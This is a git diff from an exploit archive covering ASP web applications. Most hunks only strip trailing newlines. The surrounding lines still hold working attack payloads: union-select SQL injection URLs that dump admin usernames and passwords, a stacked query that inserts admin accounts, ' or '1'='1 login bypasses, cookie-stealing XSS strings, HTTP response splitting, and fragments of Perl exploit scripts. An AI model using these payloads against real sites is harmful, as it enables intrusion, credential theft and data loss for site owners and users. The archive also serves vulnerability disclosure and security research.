+http://target/path/admin/CatalogManager/update.asp?ItemID=xx[SQL ATTACK] \ No newline at end of file diff --git a/platforms/asp/webapps/17480.txt b/platforms/asp/webapps/17480.txt index 0a1f2e828..6aac878e7 100755 --- a/platforms/asp/webapps/17480.txt +++ b/platforms/asp/webapps/17480.txt @@ -13,4 +13,4 @@ http://www.dmxready.com/?product=faqs-manager-v1 --------------------------------------------------------------------------------------------------------- Bug; -http://target/path/admin/FaqsManager/update.asp?ItemID=xx [ SQL ATTACK] +http://target/path/admin/FaqsManager/update.asp?ItemID=xx [ SQL ATTACK] \ No newline at end of file diff --git a/platforms/asp/webapps/17481.txt b/platforms/asp/webapps/17481.txt index 6d3dfaef5..7f7310d5c 100755 --- a/platforms/asp/webapps/17481.txt +++ b/platforms/asp/webapps/17481.txt @@ -12,4 +12,4 @@ http://www.dmxready.com/?product=billboard-manager ---------------------------------------------------------------------------------------------------- Bug; -http://target/path/admin/BillboardManager/update.asp?ItemID=xx [ SQL ATTACK] +http://target/path/admin/BillboardManager/update.asp?ItemID=xx [ SQL ATTACK] \ No newline at end of file diff --git a/platforms/asp/webapps/17482.txt b/platforms/asp/webapps/17482.txt index 5955b3132..3054eb4a1 100755 --- a/platforms/asp/webapps/17482.txt +++ b/platforms/asp/webapps/17482.txt @@ -14,4 +14,4 @@ http://www.dmxready.com/?product=document-library-manager ---------------------------------------------------------------------------------------------------- Bug; -http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ SQL ATTACK] +http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ SQL ATTACK] \ No newline at end of file diff --git a/platforms/asp/webapps/17493.txt b/platforms/asp/webapps/17493.txt index 33fc254c0..6d4fba960 100755 --- a/platforms/asp/webapps/17493.txt +++ b/platforms/asp/webapps/17493.txt @@ -17,4 +17,4 @@ Bug; * http://target/path/admin/SecureDocumentLibrary/DocumentLibraryManager/update.asp?ItemID=xx[SQL -ATTACK] +ATTACK] \ No newline at end of file diff --git a/platforms/asp/webapps/1759.txt b/platforms/asp/webapps/1759.txt index 5358fed4d..e99751e32 100755 --- a/platforms/asp/webapps/1759.txt +++ b/platforms/asp/webapps/1759.txt @@ -27,4 +27,4 @@ this is how you remove the user 'a': -tracewar -# milw0rm.com [2006-05-06] +# milw0rm.com [2006-05-06] \ No newline at end of file diff --git a/platforms/asp/webapps/17711.txt b/platforms/asp/webapps/17711.txt index 8bb5876ac..78768e90a 100755 --- a/platforms/asp/webapps/17711.txt +++ b/platforms/asp/webapps/17711.txt @@ -27,4 +27,4 @@ Thanks : ./ Kang chaer yang selalu memberi semangat ./ AdeYonatan yang menemani buka puasa dengan tempe mendoan =)) ./ Mas v3n0m yang menemani twitteran -./ my Love Dyla semoga cepat sembuh ya :* +./ my Love Dyla semoga cepat sembuh ya :* \ No newline at end of file diff --git a/platforms/asp/webapps/17733.txt b/platforms/asp/webapps/17733.txt index e6fde8aff..3472ee275 100755 --- a/platforms/asp/webapps/17733.txt +++ b/platforms/asp/webapps/17733.txt @@ -98,4 +98,4 @@ Edit the source code to ensure that inputs are properly sanitized. AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir -www.AmnPardaz.com +www.AmnPardaz.com \ No newline at end of file diff --git a/platforms/asp/webapps/17900.txt b/platforms/asp/webapps/17900.txt index 7e08a7e8a..e17d8a3d4 100755 --- a/platforms/asp/webapps/17900.txt +++ b/platforms/asp/webapps/17900.txt @@ -30,6 +30,4 @@ Impact: ------- Successful exploitation could allow an attacker to download the complete database of users information including email addresses, usernames and passwords and associated timesheet and expense data along with -any files contained within the subfolder of wwwroot. - - +any files contained within the subfolder of wwwroot. \ No newline at end of file diff --git a/platforms/asp/webapps/17921.txt b/platforms/asp/webapps/17921.txt index cf720c11f..9a140dc0b 100755 --- a/platforms/asp/webapps/17921.txt +++ b/platforms/asp/webapps/17921.txt @@ -33,4 +33,4 @@ Impact: By resetting the admin password an attacker would be able to completely control the application, users and their associated data such as stored credit card information. Successful database exploitation would allow an attacker to download the complete database of users information including email addresses -usernames, passwords, credit cards and associated billing and ordering data. +usernames, passwords, credit cards and associated billing and ordering data. \ No newline at end of file diff --git a/platforms/asp/webapps/1807.txt b/platforms/asp/webapps/1807.txt index 30561636d..e3fd01f16 100755 --- a/platforms/asp/webapps/1807.txt +++ b/platforms/asp/webapps/1807.txt @@ -18,4 +18,4 @@ site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1, By FarhadKey On 19 May 2006 -# milw0rm.com [2006-05-19] +# milw0rm.com [2006-05-19] \ No newline at end of file diff --git a/platforms/asp/webapps/1833.txt b/platforms/asp/webapps/1833.txt index 9872ebf6b..ce9e0813e 100755 --- a/platforms/asp/webapps/1833.txt +++ b/platforms/asp/webapps/1833.txt @@ -8,4 +8,4 @@ ### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member -# milw0rm.com [2006-05-26] +# milw0rm.com [2006-05-26] \ No newline at end of file diff --git a/platforms/asp/webapps/1834.asp b/platforms/asp/webapps/1834.asp index c22f6a5d6..0865fa6f2 100755 --- a/platforms/asp/webapps/1834.asp +++ b/platforms/asp/webapps/1834.asp @@ -46,4 +46,4 @@ Ac.klama: userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle sql sorgu cal.st.r.labilmektedir. userview.asp , topics.asp dosyalar.nda bulunan filtreleme eksikli.i nedeniyle xss kodlar. cal.sabilmektedir. -# milw0rm.com [2006-05-26] +# milw0rm.com [2006-05-26] \ No newline at end of file diff --git a/platforms/asp/webapps/1836.txt b/platforms/asp/webapps/1836.txt index 89fbe5b1b..30c9c3dbb 100755 --- a/platforms/asp/webapps/1836.txt +++ b/platforms/asp/webapps/1836.txt @@ -4,4 +4,4 @@ # Exploit Example: http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt -# milw0rm.com [2006-05-27] +# milw0rm.com [2006-05-27] \ No newline at end of file diff --git a/platforms/asp/webapps/1837.pl b/platforms/asp/webapps/1837.pl index a1127c9d5..94fa6f362 100755 --- a/platforms/asp/webapps/1837.pl +++ b/platforms/asp/webapps/1837.pl @@ -201,4 +201,4 @@ sub doadmin () } # nukedx.com [2006-05-27] -# milw0rm.com [2006-05-27] +# milw0rm.com [2006-05-27] \ No newline at end of file diff --git a/platforms/asp/webapps/1840.txt b/platforms/asp/webapps/1840.txt index ff103a94d..1fefb5acf 100755 --- a/platforms/asp/webapps/1840.txt +++ b/platforms/asp/webapps/1840.txt @@ -22,4 +22,4 @@ http://[site]/enigmadir/admin/admin_sil.asp?id=SQL # nukedx.com [2006-05-27] -# milw0rm.com [2006-05-28] +# milw0rm.com [2006-05-28] \ No newline at end of file diff --git a/platforms/asp/webapps/1845.txt b/platforms/asp/webapps/1845.txt index 914bbc0f5..6a0cb2172 100755 --- a/platforms/asp/webapps/1845.txt +++ b/platforms/asp/webapps/1845.txt @@ -12,4 +12,4 @@ GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=your # nukedx.com [2006-05-27] -# milw0rm.com [2006-05-28] +# milw0rm.com [2006-05-28] \ No newline at end of file diff --git a/platforms/asp/webapps/1849.htm b/platforms/asp/webapps/1849.htm index 303ca922f..bdf436111 100755 --- a/platforms/asp/webapps/1849.htm +++ b/platforms/asp/webapps/1849.htm @@ -66,4 +66,4 @@ http://[target]/[path]/profileupdate.asp

-# milw0rm.com [2006-05-29] +# milw0rm.com [2006-05-29] \ No newline at end of file diff --git a/platforms/asp/webapps/1850.htm b/platforms/asp/webapps/1850.htm index 97f64c30e..c1fc8a61d 100755 --- a/platforms/asp/webapps/1850.htm +++ b/platforms/asp/webapps/1850.htm @@ -40,4 +40,4 @@ Fill the blank and submit . After that login with your email ! + your password . -# milw0rm.com [2006-05-29] +# milw0rm.com [2006-05-29] \ No newline at end of file diff --git a/platforms/asp/webapps/18566.txt b/platforms/asp/webapps/18566.txt index 43999238c..c16376ebd 100755 --- a/platforms/asp/webapps/18566.txt +++ b/platforms/asp/webapps/18566.txt @@ -60,4 +60,4 @@ The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-12-003.pdf Other Sense of Security advisories can be found at: -http://www.senseofsecurity.com.au/research/it-security-advisories.php +http://www.senseofsecurity.com.au/research/it-security-advisories.php \ No newline at end of file diff --git a/platforms/asp/webapps/1859.htm b/platforms/asp/webapps/1859.htm index a33e4d4a4..b8cfd8362 100755 --- a/platforms/asp/webapps/1859.htm +++ b/platforms/asp/webapps/1859.htm @@ -76,4 +76,4 @@ valign='top'> -# milw0rm.com [2006-06-01] +# milw0rm.com [2006-06-01] \ No newline at end of file diff --git a/platforms/asp/webapps/1873.txt b/platforms/asp/webapps/1873.txt index a5918b9ed..ce7fa48f5 100755 --- a/platforms/asp/webapps/1873.txt +++ b/platforms/asp/webapps/1873.txt @@ -5,4 +5,4 @@ Exploit : http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE -# milw0rm.com [2006-06-03] +# milw0rm.com [2006-06-03] \ No newline at end of file diff --git a/platforms/asp/webapps/1884.htm b/platforms/asp/webapps/1884.htm index 33a28c710..1f620b630 100755 --- a/platforms/asp/webapps/1884.htm +++ b/platforms/asp/webapps/1884.htm @@ -9,4 +9,4 @@ -# milw0rm.com [2006-06-06] +# milw0rm.com [2006-06-06] \ No newline at end of file diff --git a/platforms/asp/webapps/1893.txt b/platforms/asp/webapps/1893.txt index c8d8ae577..5ede9c86c 100755 --- a/platforms/asp/webapps/1893.txt +++ b/platforms/asp/webapps/1893.txt @@ -135,4 +135,4 @@ Email: IRSDL[a.t]Yahoo[d0t]Com << I hope secure world for all >> -# milw0rm.com [2006-06-09] +# milw0rm.com [2006-06-09] \ No newline at end of file diff --git a/platforms/asp/webapps/1900.txt b/platforms/asp/webapps/1900.txt index 701e93712..2d23be771 100755 --- a/platforms/asp/webapps/1900.txt +++ b/platforms/asp/webapps/1900.txt @@ -13,4 +13,4 @@ # nukedx.com [2006-06-11] -# milw0rm.com [2006-06-11] +# milw0rm.com [2006-06-11] \ No newline at end of file diff --git a/platforms/asp/webapps/1930.txt b/platforms/asp/webapps/1930.txt index 3347e4a1e..3e7004771 100755 --- a/platforms/asp/webapps/1930.txt +++ b/platforms/asp/webapps/1930.txt @@ -6,4 +6,4 @@ http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5 # Credit: EntriKa -# milw0rm.com [2006-06-19] +# milw0rm.com [2006-06-19] \ No newline at end of file diff --git a/platforms/asp/webapps/1931.txt b/platforms/asp/webapps/1931.txt index 6d61cd377..27063043e 100755 --- a/platforms/asp/webapps/1931.txt +++ b/platforms/asp/webapps/1931.txt @@ -48,4 +48,4 @@ attacker can upload "cmd.asp" with this uploader and ... Solution: use ASP Stats Generator v2.1.2 (18/06/2006 ) -# milw0rm.com [2006-06-19] +# milw0rm.com [2006-06-19] \ No newline at end of file diff --git a/platforms/asp/webapps/19394.txt b/platforms/asp/webapps/19394.txt index 86c6dd495..7f3604d9b 100755 --- a/platforms/asp/webapps/19394.txt +++ b/platforms/asp/webapps/19394.txt @@ -12,4 +12,4 @@ http://server/' ---> blind SQL http://server/agencyprofile.asp?AG_ID=' http://server/employer-profile.asp?ag_id=' -There are other SQL Blind injections ;) +There are other SQL Blind injections ;) \ No newline at end of file diff --git a/platforms/asp/webapps/1987.txt b/platforms/asp/webapps/1987.txt index ea133e4aa..d07aebe7e 100755 --- a/platforms/asp/webapps/1987.txt +++ b/platforms/asp/webapps/1987.txt @@ -178,4 +178,4 @@ Related URLs: http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl) http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB) -# milw0rm.com [2006-07-06] +# milw0rm.com [2006-07-06] \ No newline at end of file diff --git a/platforms/asp/webapps/20035.js b/platforms/asp/webapps/20035.js index d3671f253..b7cc7590a 100755 --- a/platforms/asp/webapps/20035.js +++ b/platforms/asp/webapps/20035.js @@ -141,4 +141,4 @@ else { alert("Victim Exploited - not running attack again"); //deleteCookie("mix0"); -} +} \ No newline at end of file diff --git a/platforms/asp/webapps/21085.txt b/platforms/asp/webapps/21085.txt index c2d8b5a26..906c7c37d 100755 --- a/platforms/asp/webapps/21085.txt +++ b/platforms/asp/webapps/21085.txt @@ -66,5 +66,4 @@ The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-12-009.pdf Other Sense of Security advisories can be found at: -http://www.senseofsecurity.com.au/research/it-security-advisories.php - +http://www.senseofsecurity.com.au/research/it-security-advisories.php \ No newline at end of file diff --git a/platforms/asp/webapps/21272.txt b/platforms/asp/webapps/21272.txt index d8586e01a..1dab7e1c9 100755 --- a/platforms/asp/webapps/21272.txt +++ b/platforms/asp/webapps/21272.txt @@ -328,4 +328,4 @@ Exemple> php knowledgebase0day.php kbase.target.com /foo } -?> +?> \ No newline at end of file diff --git a/platforms/asp/webapps/2138.txt b/platforms/asp/webapps/2138.txt index 7c53b5ccb..2b797d431 100755 --- a/platforms/asp/webapps/2138.txt +++ b/platforms/asp/webapps/2138.txt @@ -9,4 +9,4 @@ http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20sele Admin pass: http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201 -# milw0rm.com [2006-08-07] +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/platforms/asp/webapps/2150.txt b/platforms/asp/webapps/2150.txt index 5f5b835ec..2f389c845 100755 --- a/platforms/asp/webapps/2150.txt +++ b/platforms/asp/webapps/2150.txt @@ -21,4 +21,4 @@ after login as user; #Forever milw0rm ;) -# milw0rm.com [2006-08-08] +# milw0rm.com [2006-08-08] \ No newline at end of file diff --git a/platforms/asp/webapps/2186.txt b/platforms/asp/webapps/2186.txt index 4be6a5ccc..951d0286f 100755 --- a/platforms/asp/webapps/2186.txt +++ b/platforms/asp/webapps/2186.txt @@ -19,4 +19,4 @@ http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1, #Greetz: Str0ke Forever milw0rm ;) -# milw0rm.com [2006-08-14] +# milw0rm.com [2006-08-14] \ No newline at end of file diff --git a/platforms/asp/webapps/21914.txt b/platforms/asp/webapps/21914.txt index 0ab677b92..d9c9909ab 100755 --- a/platforms/asp/webapps/21914.txt +++ b/platforms/asp/webapps/21914.txt @@ -16,6 +16,4 @@ As a result, users may include malicious HTML and script code inside of guestboo [img]javascript:{SCRIPT}[/img] -[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image] - - +[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image] \ No newline at end of file diff --git a/platforms/asp/webapps/2228.txt b/platforms/asp/webapps/2228.txt index 955c13e2b..d7ab10821 100755 --- a/platforms/asp/webapps/2228.txt +++ b/platforms/asp/webapps/2228.txt @@ -24,4 +24,4 @@ #Admin Panel : http://www.target.com/path/admin/login.asp # ########################################################### -# milw0rm.com [2006-08-20] +# milw0rm.com [2006-08-20] \ No newline at end of file diff --git a/platforms/asp/webapps/2230.txt b/platforms/asp/webapps/2230.txt index 5cadfe059..16584d82c 100755 --- a/platforms/asp/webapps/2230.txt +++ b/platforms/asp/webapps/2230.txt @@ -24,4 +24,4 @@ #Admin Panel : http://www.target.com/path/admin # ################################################# -# milw0rm.com [2006-08-20] +# milw0rm.com [2006-08-20] \ No newline at end of file diff --git a/platforms/asp/webapps/22437.txt b/platforms/asp/webapps/22437.txt index 041e91105..897838439 100755 --- a/platforms/asp/webapps/22437.txt +++ b/platforms/asp/webapps/22437.txt @@ -5,5 +5,4 @@ MyGuestBk has been reported vulnerable to unauthorized Admin Panel Access. It has been reported that an attacker may access arbitrary MyGuestBK administrative functions through the MyGuestBK administration panel without prior authorization. http://www.example.com/myguestBk/admin/index.asp -http://www.example.com/myguestBk/admin/delEnt.asp?id=NEWSNUMBER - +http://www.example.com/myguestBk/admin/delEnt.asp?id=NEWSNUMBER \ No newline at end of file diff --git a/platforms/asp/webapps/22583.pl b/platforms/asp/webapps/22583.pl index 648e36474..5eff162f1 100755 --- a/platforms/asp/webapps/22583.pl +++ b/platforms/asp/webapps/22583.pl @@ -94,4 +94,4 @@ sub open_TCP $| = 1; select( $old_fh ); return 1; -} +} \ No newline at end of file diff --git a/platforms/asp/webapps/22697.asp b/platforms/asp/webapps/22697.asp index 736423798..2e0af8cc9 100755 --- a/platforms/asp/webapps/22697.asp +++ b/platforms/asp/webapps/22697.asp @@ -33,4 +33,4 @@ with (Response) { Write("Admin Info : "+admin+"

"); Write(fileRead(admin)); } -%> +%> \ No newline at end of file diff --git a/platforms/asp/webapps/22698.pl b/platforms/asp/webapps/22698.pl index db973d271..b4c9d0c42 100755 --- a/platforms/asp/webapps/22698.pl +++ b/platforms/asp/webapps/22698.pl @@ -35,4 +35,4 @@ my $gembel = HTTP::Request->new(GET => $legend); my $dodol = $bosen->request($gembel); if ($dodol->is_error()) { printf " %s\n", $dodol->status_line; } else { print "Alhamdulillah :P\n"; } -print "\n680165\n"; +print "\n680165\n"; \ No newline at end of file diff --git a/platforms/asp/webapps/22724.txt b/platforms/asp/webapps/22724.txt index 523472ecc..956a0b56f 100755 --- a/platforms/asp/webapps/22724.txt +++ b/platforms/asp/webapps/22724.txt @@ -8,6 +8,4 @@ An attacker may exploit this vulnerability to insert SQL code into requests and http://examplestore.com/manage/login.asp User: admin -Pass: ' or '1' = '1 - - +Pass: ' or '1' = '1 \ No newline at end of file diff --git a/platforms/asp/webapps/2287.txt b/platforms/asp/webapps/2287.txt index 97e4cc732..8d62b86ad 100755 --- a/platforms/asp/webapps/2287.txt +++ b/platforms/asp/webapps/2287.txt @@ -16,4 +16,4 @@ #Admin Panel : http://www.target.com/path/admin/default.asp # ############################################################# -# milw0rm.com [2006-09-01] +# milw0rm.com [2006-09-01] \ No newline at end of file diff --git a/platforms/asp/webapps/22889.pl b/platforms/asp/webapps/22889.pl index cd69c8f78..7bae844b9 100755 --- a/platforms/asp/webapps/22889.pl +++ b/platforms/asp/webapps/22889.pl @@ -39,4 +39,4 @@ if ($#ARGV<3){ } else { print "Tuing !\n"; } - print "\n680165\n"; + print "\n680165\n"; \ No newline at end of file diff --git a/platforms/asp/webapps/2294.txt b/platforms/asp/webapps/2294.txt index 9104f82e5..9e6d83a6b 100755 --- a/platforms/asp/webapps/2294.txt +++ b/platforms/asp/webapps/2294.txt @@ -13,4 +13,4 @@ #BURCU Seni hep sevdim hep sevicem. -# milw0rm.com [2006-09-03] +# milw0rm.com [2006-09-03] \ No newline at end of file diff --git a/platforms/asp/webapps/2296.txt b/platforms/asp/webapps/2296.txt index e8ce1d15d..2faa9fb2a 100755 --- a/platforms/asp/webapps/2296.txt +++ b/platforms/asp/webapps/2296.txt @@ -71,4 +71,4 @@ | __/ (_) | _| \___|\___/|_|. -# milw0rm.com [2006-09-04] +# milw0rm.com [2006-09-04] \ No newline at end of file diff --git a/platforms/asp/webapps/23005.txt b/platforms/asp/webapps/23005.txt index 6f547ef63..3c48a2b46 100755 --- a/platforms/asp/webapps/23005.txt +++ b/platforms/asp/webapps/23005.txt @@ -29,4 +29,4 @@ In “config.asp”, wherever you have: Change it to: - ConfigAllowedExtensions.Add “File”,”^(Extensions Here)$” + ConfigAllowedExtensions.Add “File”,”^(Extensions Here)$” \ No newline at end of file diff --git a/platforms/asp/webapps/2306.txt b/platforms/asp/webapps/2306.txt index 07adb6b5f..395842da0 100755 --- a/platforms/asp/webapps/2306.txt +++ b/platforms/asp/webapps/2306.txt @@ -20,4 +20,4 @@ #Admin Panel : http://www.target.com/path/theadmin/default.asp # ################################################################ -# milw0rm.com [2006-09-05] +# milw0rm.com [2006-09-05] \ No newline at end of file diff --git a/platforms/asp/webapps/2362.txt b/platforms/asp/webapps/2362.txt index a45fe409c..9f2161b02 100755 --- a/platforms/asp/webapps/2362.txt +++ b/platforms/asp/webapps/2362.txt @@ -10,4 +10,4 @@ http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+f uyeno = 1 or 2( Admin ID ) -# milw0rm.com [2006-09-13] +# milw0rm.com [2006-09-13] \ No newline at end of file diff --git a/platforms/asp/webapps/23703.txt b/platforms/asp/webapps/23703.txt index fee77edbf..63fb67e55 100755 --- a/platforms/asp/webapps/23703.txt +++ b/platforms/asp/webapps/23703.txt @@ -4,4 +4,4 @@ EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The spe http://www.example.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel +)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&I -+DBrand=0&resultCnt=200&Submit.x=33& ++DBrand=0&resultCnt=200&Submit.x=33& \ No newline at end of file diff --git a/platforms/asp/webapps/2371.txt b/platforms/asp/webapps/2371.txt index e1daab5e9..2ab06f6c2 100755 --- a/platforms/asp/webapps/2371.txt +++ b/platforms/asp/webapps/2371.txt @@ -17,4 +17,4 @@ http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+u + Admin Password: (Big Letters) http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1 -# milw0rm.com [2006-09-15] +# milw0rm.com [2006-09-15] \ No newline at end of file diff --git a/platforms/asp/webapps/2384.txt b/platforms/asp/webapps/2384.txt index 0e1240642..0d13dd89c 100755 --- a/platforms/asp/webapps/2384.txt +++ b/platforms/asp/webapps/2384.txt @@ -18,4 +18,4 @@ browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0, # ajann,Turkey # ... -# milw0rm.com [2006-09-17] +# milw0rm.com [2006-09-17] \ No newline at end of file diff --git a/platforms/asp/webapps/2385.txt b/platforms/asp/webapps/2385.txt index 9dee5d138..b2b706530 100755 --- a/platforms/asp/webapps/2385.txt +++ b/platforms/asp/webapps/2385.txt @@ -25,4 +25,4 @@ With admin username and password take it,after join to login page: # ... # Im not Hacker! -# milw0rm.com [2006-09-17] +# milw0rm.com [2006-09-17] \ No newline at end of file diff --git a/platforms/asp/webapps/2386.txt b/platforms/asp/webapps/2386.txt index 7af774e6d..baba473f2 100755 --- a/platforms/asp/webapps/2386.txt +++ b/platforms/asp/webapps/2386.txt @@ -20,4 +20,4 @@ Pls UserID Change(1,2,3,4,5.....) # ... # Im not [Turkish]Hacker! -# milw0rm.com [2006-09-17] +# milw0rm.com [2006-09-17] \ No newline at end of file diff --git a/platforms/asp/webapps/23863.txt b/platforms/asp/webapps/23863.txt index a334bfd42..144dc53f2 100755 --- a/platforms/asp/webapps/23863.txt +++ b/platforms/asp/webapps/23863.txt @@ -6,4 +6,4 @@ The issues exist in the 'comment_add.asp', 'search.asp', 'category_news_headline News Manager Lite 2.5 is reported to be affected by these issues, however, other versions may be affected as well. -Cookie: NEWS%5FLOGIN=ADMIN=1&ID=1 +Cookie: NEWS%5FLOGIN=ADMIN=1&ID=1 \ No newline at end of file diff --git a/platforms/asp/webapps/2387.txt b/platforms/asp/webapps/2387.txt index 7b543b46a..54a074c3e 100755 --- a/platforms/asp/webapps/2387.txt +++ b/platforms/asp/webapps/2387.txt @@ -38,4 +38,4 @@ Phone # ... # Im not Hacker! -# milw0rm.com [2006-09-17] +# milw0rm.com [2006-09-17] \ No newline at end of file diff --git a/platforms/asp/webapps/2395.txt b/platforms/asp/webapps/2395.txt index 89be3286d..022686b49 100755 --- a/platforms/asp/webapps/2395.txt +++ b/platforms/asp/webapps/2395.txt @@ -15,4 +15,4 @@ http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2 -# milw0rm.com [2006-09-19] +# milw0rm.com [2006-09-19] \ No newline at end of file diff --git a/platforms/asp/webapps/23968.txt b/platforms/asp/webapps/23968.txt index f38701281..1989add18 100755 --- a/platforms/asp/webapps/23968.txt +++ b/platforms/asp/webapps/23968.txt @@ -95,4 +95,4 @@ Risk Factor: Credits: -------- Antu Sanadi of SecPod Technologies has been credited with the discovery of this -vulnerability. +vulnerability. \ No newline at end of file diff --git a/platforms/asp/webapps/2416.txt b/platforms/asp/webapps/2416.txt index a3edc9a2f..99ff77015 100755 --- a/platforms/asp/webapps/2416.txt +++ b/platforms/asp/webapps/2416.txt @@ -8,4 +8,4 @@ # Greetz To : str0ke :) -# milw0rm.com [2006-09-22] +# milw0rm.com [2006-09-22] \ No newline at end of file diff --git a/platforms/asp/webapps/2421.pl b/platforms/asp/webapps/2421.pl index b0d1c5d43..5e9b6659e 100755 --- a/platforms/asp/webapps/2421.pl +++ b/platforms/asp/webapps/2421.pl @@ -43,4 +43,4 @@ else #To Be Or Not To Be! -# milw0rm.com [2006-09-24] +# milw0rm.com [2006-09-24] \ No newline at end of file diff --git a/platforms/asp/webapps/2423.txt b/platforms/asp/webapps/2423.txt index 4f89d28a1..a49b2637d 100755 --- a/platforms/asp/webapps/2423.txt +++ b/platforms/asp/webapps/2423.txt @@ -15,4 +15,4 @@ http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi Password encrytped with SHA-256 -# milw0rm.com [2006-09-24] +# milw0rm.com [2006-09-24] \ No newline at end of file diff --git a/platforms/asp/webapps/24300.pl b/platforms/asp/webapps/24300.pl index 067b6364c..857414ad2 100755 --- a/platforms/asp/webapps/24300.pl +++ b/platforms/asp/webapps/24300.pl @@ -148,4 +148,4 @@ while (<$remote>) close($remote); -# INSERT INTO users ( user_name, password, editactiontime, orgstructure, createviewtemplate, removelogins, editlinkedfiles, newencrypt, showalljobs, publishmacros, override_contract ) VALUES ('Hacked', '60716363677F6274', 1, 1, 1, 1, 1, 'Y', 1, 1, 1) # Password is 'password' +# INSERT INTO users ( user_name, password, editactiontime, orgstructure, createviewtemplate, removelogins, editlinkedfiles, newencrypt, showalljobs, publishmacros, override_contract ) VALUES ('Hacked', '60716363677F6274', 1, 1, 1, 1, 1, 'Y', 1, 1, 1) # Password is 'password' \ No newline at end of file diff --git a/platforms/asp/webapps/24302.pl b/platforms/asp/webapps/24302.pl index f3cb9c2cb..edef47697 100755 --- a/platforms/asp/webapps/24302.pl +++ b/platforms/asp/webapps/24302.pl @@ -204,4 +204,4 @@ Cookie: HelpDesk_User=UserType=6&UserID=1;\r\ $Print = 1; } } -} +} \ No newline at end of file diff --git a/platforms/asp/webapps/24314.txt b/platforms/asp/webapps/24314.txt index c065caa1f..15a644826 100755 --- a/platforms/asp/webapps/24314.txt +++ b/platforms/asp/webapps/24314.txt @@ -8,5 +8,4 @@ http://www.example.com/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&Targe geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc %5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne -edQuotes=&NeedQuotes=&action=view - +edQuotes=&NeedQuotes=&action=view \ No newline at end of file diff --git a/platforms/asp/webapps/24316.txt b/platforms/asp/webapps/24316.txt index 863a94ec2..ac8d2e4f5 100755 --- a/platforms/asp/webapps/24316.txt +++ b/platforms/asp/webapps/24316.txt @@ -7,4 +7,4 @@ ASPRunner versions 2.4 and prior are affect by these issues. http://www.example.com/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29% 3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben %5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1& -pagesize=20 +pagesize=20 \ No newline at end of file diff --git a/platforms/asp/webapps/24422.txt b/platforms/asp/webapps/24422.txt index 9217213e5..c931401a7 100755 --- a/platforms/asp/webapps/24422.txt +++ b/platforms/asp/webapps/24422.txt @@ -8,6 +8,4 @@ http://www.example.com/path_to_comersus/comersus_customerLoggedVerify.asp? redirecturl=%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-L -ength:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html} - - +ength:%2028%0d%0a%0d%0a{html}0wned%20by%20me{/html} \ No newline at end of file diff --git a/platforms/asp/webapps/25483.txt b/platforms/asp/webapps/25483.txt index fe56603cb..413c9de5b 100755 --- a/platforms/asp/webapps/25483.txt +++ b/platforms/asp/webapps/25483.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos These vulnerabilities are reported to affect DUportal/DUportal SQL 3.1.2; earlier versions may also be affected. -http://www.example.com/test_DUportal/includes/inc_poll_voting.asp?DAT_PARENT='SQL_INJECTION&DAT_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&DAT_ID=112 